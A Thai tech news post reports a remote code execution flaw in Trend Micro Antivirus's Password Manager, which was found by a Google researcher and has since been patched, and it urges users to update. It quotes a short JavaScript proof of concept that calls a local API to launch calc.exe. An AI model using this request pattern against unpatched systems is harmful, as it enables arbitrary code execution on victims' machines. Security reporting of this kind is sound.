พบบั๊ก Remote Code Execution บน Trend Micro Antivirus พร้อมออก Patch แก้ไขแล้ว

Credit: ShutterStock.com
Credit: ShutterStock.com

นักวิจัยของ Google ได้ออกมาเปิดเผยถึงบั๊ก Remote Code Execution บน Antivirus ของ Trend Micro ในส่วนของระบบ Password Manager ที่มีการเปิด HTTP RPC Port มากมายสำหรับรับการเรียก API ต่างๆ ด้วยโค้ด JavaScript ที่ทำงานบน node.js ทำให้ผู้โจมตีสามารถเรียกคำสั่งแบบนี้ได้

x = new XMLHttpRequest()
x.open(“GET”, “https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe true);
try { x.send(); } catch (e) {};

ปัญหานี้ถูกรายงานเข้ามา 6 วันก่อน และทีมงาน Trend Micro ก็ได้ออก Patch เพื่ออุดช่องโหว่แล้วในวันนี้โดยที่ยังไม่มีรายงานการโจมตีที่เกิดขึ้นจากช่องโหว่นี้แต่อย่างใด (แต่คงจะเริ่มมีวันนี้แหละถ้าไม่อัพเดตกัน) ใครใช้ Antivirus ของ Trend Micro ก็รีบอัพเดตกันนะครับ

ที่มา: http://blog.trendmicro.com/information-on-reported-vulnerabilities-in-trend-micro-password-manager/ , https://code.google.com/p/google-security-research/issues/detail?id=693

About techtalkthai

ทีมงาน TechTalkThai เป็นกลุ่มบุคคลที่ทำงานในสาย Enterprise IT ที่มีความเชี่ยวชาญทางด้าน Network, Security, Server, Storage, Operating System และ Virtualization มารวมตัวกันเพื่ออัพเดตข่าวสารทางด้าน Enterprise IT ให้แก่ชาว IT ในไทยโดยเฉพาะ

Check Also

NDBS Thailand จับมือพันธมิตรชั้นนำ จัดงาน NDBS Thailand & SAP User Conference 2024 ภายใต้คอนเซปต์ Bring Out The Best วันศุกร์ที่ 18 ตุลาคม 2024 ณ The Athenee Hotel, a Luxury Collection Hotel, Bangkok

NDBS Thailand  บริษัทที่ปรึกษาชั้นนำในการติดตั้งระบบซอฟแวร์ SAP on Cloud และ SAP Business One  ขอเรียนเชิญผู้บริหาร, ผู้นำองค์กรธุรกิจ รวมถึงผู้ประกอบการในกลุ่มธุรกิจ SMEs ร่วมงานสัมมนายกระดับการบริหารจัดการธุรกิจตามแนวคิด …

Microsoft ยกเลิกการสนับสนุนโปรโตคอล VPN แบบ PPTP และ L2TP ใน Windows Server

Microsoft ประกาศยกเลิกการสนับสนุนโปรโตคอล VPN แบบ PPTP และ L2TP ใน Windows Server แนะนำให้ใช้งานโปรโตคอล SSTP และ IKEv2 แทน